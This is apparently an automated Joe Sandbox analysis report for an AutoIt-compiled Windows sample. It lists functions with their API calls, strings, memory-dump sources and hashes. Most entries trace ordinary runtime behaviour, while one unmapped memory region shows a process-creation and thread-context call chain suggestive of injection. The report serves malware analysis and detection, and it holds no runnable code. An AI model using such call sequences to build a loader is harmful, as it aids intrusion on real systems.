GetLastError.KERNEL32 ref: 0055076F
__dosmaperr.LIBCMT ref: 00550776
GetFileType.KERNELBASE(00000000), ref: 00550782
GetLastError.KERNEL32 ref: 0055078C
__dosmaperr.LIBCMT ref: 00550795
CloseHandle.KERNEL32(00000000), ref: 005507B5
CloseHandle.KERNEL32(?), ref: 005508FF
GetLastError.KERNEL32 ref: 00550931
__dosmaperr.LIBCMT ref: 00550938

Strings

H, xrefs: 005508BD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
Instruction ID: 86c9dab704b1307408f9815d7b70e31a8ce6c6967f8c5cd898817c4fe478aa28
Opcode Fuzzy Hash: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
Instruction Fuzzy Hash: 7DA14636A101058FDF19AF68DCA5BAE3FA0FB46321F14115AFC119F2D1DB31981ADB91

Function 0051344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78

Part of subcall function 00513357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00513379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0051356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0055318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005531CE
RegCloseKey.ADVAPI32(?), ref: 00553210
_wcslen.LIBCMT ref: 00553277
_wcslen.LIBCMT ref: 00553286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00513560
\Include\, xrefs: 00513527
Include, xrefs: 00553184, 005531C5
\, xrefs: 0055328C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 8b1603e3cdd3a94386e423249b5f248d7ed76782cc7443d9aeeefbf5c27e7617
Instruction ID: 92f4a2eb1b32ecace75e30f4bbb629a098089ed271d80905e5beff44e7be68d5
Opcode Fuzzy Hash: 8b1603e3cdd3a94386e423249b5f248d7ed76782cc7443d9aeeefbf5c27e7617
Instruction Fuzzy Hash: 23716D714043419ED318DF65DC969ABBFE8BF99740F40082EF585871A4EB709A88DF61

Function 00512B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00512B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00512B9D
LoadIconW.USER32(00000063), ref: 00512BB3
LoadIconW.USER32(000000A4), ref: 00512BC5
LoadIconW.USER32(000000A2), ref: 00512BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00512BEF
RegisterClassExW.USER32(?), ref: 00512C40

Part of subcall function 00512CD4: GetSysColorBrush.USER32(0000000F), ref: 00512D07
Part of subcall function 00512CD4: RegisterClassExW.USER32(00000030), ref: 00512D31
Part of subcall function 00512CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
Part of subcall function 00512CD4: InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
Part of subcall function 00512CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
Part of subcall function 00512CD4: LoadIconW.USER32(000000A9), ref: 00512D85
Part of subcall function 00512CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94

Strings

0, xrefs: 00512C0F
#, xrefs: 00512C16
AutoIt v3, xrefs: 00512C2F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
Instruction ID: ab420cb404ae0d20ee839d5fdab40278d11b92ac88542dcbe3edf1425b223d21
Opcode Fuzzy Hash: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
Instruction Fuzzy Hash: 90216A70E00358AFDB149FA5EC89AAD7FF4FB1CB50F00041AE580AA7A0D3B10548EF88

Function 00513170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0051316A,?,?), ref: 005131D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0051316A,?,?), ref: 00513204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00513227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0051316A,?,?), ref: 00513232
CreatePopupMenu.USER32 ref: 00513246
PostQuitMessage.USER32(00000000), ref: 00513267

Strings

TaskbarCreated, xrefs: 0051322D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
Instruction ID: 2ab847bb1c256f8f2e4315ca530101497210aa3205ea15995f18b23dfea5c71b
Opcode Fuzzy Hash: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
Instruction Fuzzy Hash: E7414939240644B7FB186B78DC7DBFD3E59F756340F04052AF9528A1A1CB708AC8E7A5

Function 0051DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%^, xrefs: 0051E4B1
D%^, xrefs: 00562FDA
D%^D%^, xrefs: 0051E27E
D%^, xrefs: 0056302D
Variable must be of type 'Object'., xrefs: 005632B7
D%^, xrefs: 0051E1E0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: D%^$D%^$D%^$D%^$D%^D%^$Variable must be of type 'Object'.
API String ID: 0-438337734
Opcode ID: b73e8a981823ac3e5ab98131003153fcbd07f0ae4d15a0561cc02c23900b1f11
Instruction ID: 323d3e8f8dbce0a03a566d9cec9c41876ebecf7366e5eac5a79410ab5342d786
Opcode Fuzzy Hash: b73e8a981823ac3e5ab98131003153fcbd07f0ae4d15a0561cc02c23900b1f11
Instruction Fuzzy Hash: B4C2BF71A00215CFEB24CF58D886AADBBB1FF59310F248969ED56AB391D370ED81CB50

Function 01603050 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01603121
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01603347

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: e375c4ebad231ab9862f4d497d801bd8f960759f2df405cf38e52dfed4ebcb59
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: 95A1F874E00209EFDB19CFA4C994BAEBBB5BF48306F208559E601BB3C1D7759A41CB94

Function 00512C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00512C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00512CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CCF

Strings

edit, xrefs: 00512CAC
AutoIt v3, xrefs: 00512C89, 00512C8E, 00512C8F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
Instruction ID: b78191da6a19a4070b5bd1660b6506e9f4f27e897899a2873503c4c8845f81f5
Opcode Fuzzy Hash: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
Instruction Fuzzy Hash: 1FF03A755402D07EEB300713AC88E773EBDE7EBF50B00045EF940AA5A0C6711848EAB8

Function 01602E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01602D20: Sleep.KERNELBASE(000001F4), ref: 01602D31

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01602F42

Strings

YPS0PMUE59SM6XX98SC, xrefs: 01602FA5, 01602FA8

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateFileSleep
String ID: YPS0PMUE59SM6XX98SC
API String ID: 2694422964-747375993
Opcode ID: 27a900c224153b7df6cbe6dcf47292ffa1986938470c38a81735931869e405a9
Instruction ID: 881bb00102ab2f31a2f1724860860f38d3644f75e6f89f56587497d84a1abf9b
Opcode Fuzzy Hash: 27a900c224153b7df6cbe6dcf47292ffa1986938470c38a81735931869e405a9
Instruction Fuzzy Hash: 82515D31D04249DAEB16DBA4CC18BEFBB79AF15301F004199E619BB2C1D6B50B49CBA5

Function 00582947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582C05
DeleteFileW.KERNEL32(?), ref: 00582C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00582C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CC0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 0b3bda7bcd7fa98b3cca3caeb28c7b726303a62aa60eda0791c99cb9cef91687
Instruction ID: d8a466fde6715d192c1b25391eab9c62b1a2b36353e92d2b34031b6139532f0e
Opcode Fuzzy Hash: 0b3bda7bcd7fa98b3cca3caeb28c7b726303a62aa60eda0791c99cb9cef91687
Instruction Fuzzy Hash: 99B1417190111AABDF15EBA4CC89EEE7FBDFF89350F1040A6F909F6141EA319A448F61

Function 00545AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JOQ, xrefs: 00545BA8, 00545C6C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: JOQ
API String ID: 0-3921798060
Opcode ID: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
Instruction ID: 6a2e05dfffb8997bfcb0bbf0ecc67ba69fdb86b8c7cd3d9f2bc7bf9880926ced
Opcode Fuzzy Hash: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
Instruction Fuzzy Hash: CE51BE75D0060A9BCB259FA4CC89FEEBFB8FF45318F14045AF405A7292E6319D01DB61

Function 00513B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B83

Strings

Control Panel\Mouse, xrefs: 00513B3E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
Instruction ID: 09d53879e9682ef28836425b54e2f20288d6eab53c977c5ae174cfe8191ab0fe
Opcode Fuzzy Hash: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
Instruction Fuzzy Hash: 35112AB5514208FFEB208FA5DC58AEFBBB8FF05744B104859A805D7110E2319E84A760

Function 01601D20 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016024DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01602571
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01602593

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
Instruction ID: 8d86dd18d7d378bcf28d15803fc2f25b1d60aa339e1ed62b7cd0799fd39bb675
Opcode Fuzzy Hash: 99ff7f62c7c0315fa1339eff959a02870827681df0665961f4f58c830292e5bf
Instruction Fuzzy Hash: C5620B34A142189BEB29CBA4CC54BDEB772EF58300F1091A9D10DEB3D0E7769E85CB59

Function 00513923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005533A2

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04

Strings

Line: , xrefs: 005533EB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 05eea6fcb1ada2521fcb5a0d5e221eaf53a1451a317741dcebe2744874c77966
Instruction ID: 37012539bff7429e0e1a0e8109a5fc8a43f79459d6da61c8ef5df5daa4e78fbd
Opcode Fuzzy Hash: 05eea6fcb1ada2521fcb5a0d5e221eaf53a1451a317741dcebe2744874c77966
Instruction Fuzzy Hash: 2431E271408301AAE325EB20DC59BEBBFD8BF94710F100D2AF59993091EB709688C7C6

Function 00512DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00552C8C

Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2

Part of subcall function 00512DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4

Strings

`e], xrefs: 00552C85
X, xrefs: 00552C5A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e]
API String ID: 779396738-2761306869
Opcode ID: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
Instruction ID: 6c7f1b1fc690e06ec670124cc7bb6c773e2ca169bf0c90e93474dc7d2e786c83
Opcode Fuzzy Hash: 233d51a63626955e37975bd671959e772abcd52637bf02909dccb5e526c68677
Instruction Fuzzy Hash: 64218171A002589BDB41DF98D849BEE7FF8BF89305F00405AE405A7241DBB45A898F61

Function 0052FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00530668

Part of subcall function 005332A4: RaiseException.KERNEL32(?,?,?,0053068A,?,005E1444,?,?,?,?,?,?,0053068A,00511129,005D8738,00511129), ref: 00533304

__CxxThrowException@8.LIBVCRUNTIME ref: 00530685

Strings

Unknown exception, xrefs: 00530692

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: c71999923d2a1515696546d23750eedc3b54cedce785c4248cf2589d742347fa
Instruction ID: 330f89fbd2b33b6d71b1ab31fef8c90d072caeb2ce816210f737f1f86866d3d9
Opcode Fuzzy Hash: c71999923d2a1515696546d23750eedc3b54cedce785c4248cf2589d742347fa
Instruction Fuzzy Hash: DEF0C23490030E77CF00B6A8E85AC9E7F7CBE81310F604532B824D65D5EF71EA65CA80

Function 00583017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0058302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00583044

Strings

aut, xrefs: 00583038

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
Instruction ID: 6349e2c1f7829ac0352a18ac60e74142055a2daec3e7fff74015cc1ae81553e9
Opcode Fuzzy Hash: 038fd748eb899c10e404d46cb98af4203e423808cc145bea8e3fd1be1bbd4c8d
Instruction Fuzzy Hash: 27D05B7550031467DB3097949D0DFC73F6CDB05750F0001927795D2091DAB09544CAD0

Function 00597F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005982F5
TerminateProcess.KERNEL32(00000000), ref: 005982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 005984DD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: dd4315aae567811ed5560a780dfd1ee5064c2bf0e95d715c0aa77fe4b887cb1d
Instruction ID: 0d96c532a0a2ee81883e9a0173f347c5bb0cf8102b6e3803287d85da41dbf445
Opcode Fuzzy Hash: dd4315aae567811ed5560a780dfd1ee5064c2bf0e95d715c0aa77fe4b887cb1d
Instruction Fuzzy Hash: 80126B71A083019FDB14DF28C484B6ABBE5BF89318F04895DE8998B352DB31ED45CF92

Function 005110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

